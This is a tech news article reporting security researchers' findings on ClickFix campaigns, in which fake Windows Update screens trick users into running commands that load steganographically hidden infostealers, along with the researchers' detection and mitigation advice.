- Fake Windows updates deliver advanced malware hidden inside encrypted PNG images
- Hackers trick victims with update screens that secretly execute malicious commands
- Stego Loader reconstructs dangerous payloads entirely in memory using C# routines
Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.
ClickFix attacks convince users to execute commands in Windows by mimicking legitimate update prompts in full-screen web browser pages, Huntress researchers Ben Folland and Anna Pham found.
The experts reported that in some instances, attackers instruct victims to press specific keys, which automatically paste malicious commands into the Windows Run box.
Steganography and multi-stage payloads
These commands then trigger malware execution, bypassing standard system protections and affecting both individual and enterprise systems.
The malware payloads are hidden using steganography inside PNG images, encrypted with AES, and reconstructed by a .NET assembly called Stego Loader.
This loader extracts the shellcode using custom C# routines and repacks it with the Donut tool, allowing execution of VBScript, JScript, EXE, DLL files, and .NET assemblies entirely in memory.
Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.
The use of steganography in these attacks demonstrates that malware delivery is moving beyond traditional executable files, creating a new challenge for threat detection and incident response teams.
Attackers also implement dynamic evasion tactics such as ctrampoline, which calls thousands of empty functions to make analysis more difficult.
One variant using the fake Windows Update lure was detected in October 2025, and law enforcement disrupted part of its infrastructure through Operation Endgame in November.
This prevented the final payload from being delivered via malicious domains, although the fake update pages remain active.
The attacks continue to evolve, alternating between human verification prompts and update animations to trick users into executing commands.
The researchers recommend monitoring process chains for suspicious activity, such as explorer.exe spawning mshta.exe or PowerShell.
Investigators can also review the RunMRU registry key for executed commands.
Organizations are advised to combine malware removal practices with antivirus scanning and firewall protection to limit exposure.
Disabling the Windows Run box, where feasible, and carefully inspecting image-based payloads are additional recommended precautions.
Enterprises must account for risks that arise from legitimate-looking assets, such as images and scripts, being weaponized, which complicates logging, monitoring, and forensic analysis.
This also raises concerns about supply chain security and the potential for attackers to exploit trusted update mechanisms as entry points.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.